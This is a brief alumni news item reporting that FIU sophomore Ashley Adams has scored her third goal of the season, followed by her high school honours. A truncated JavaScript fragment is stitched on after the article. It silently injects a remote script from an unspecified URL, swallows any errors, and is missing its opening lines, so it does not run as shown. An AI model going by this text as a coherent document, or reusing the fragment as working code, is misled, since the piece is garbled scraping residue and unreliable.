Alumni
Alumni: Ashley Adams Scores Third Goal
Article found at fiusports.com
NOTABLE
>> Sophomore Ashley Adams has now scored four goals for her young career at FIU.
>> Adams is the first Panther to score three goals in a season since Alyssa Robinson’s six in 2016.
Ashley Adams (Lakota West class of 2016)– Named All GMC 1st team in 2014 and All GMC 2nd team in 2015.
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();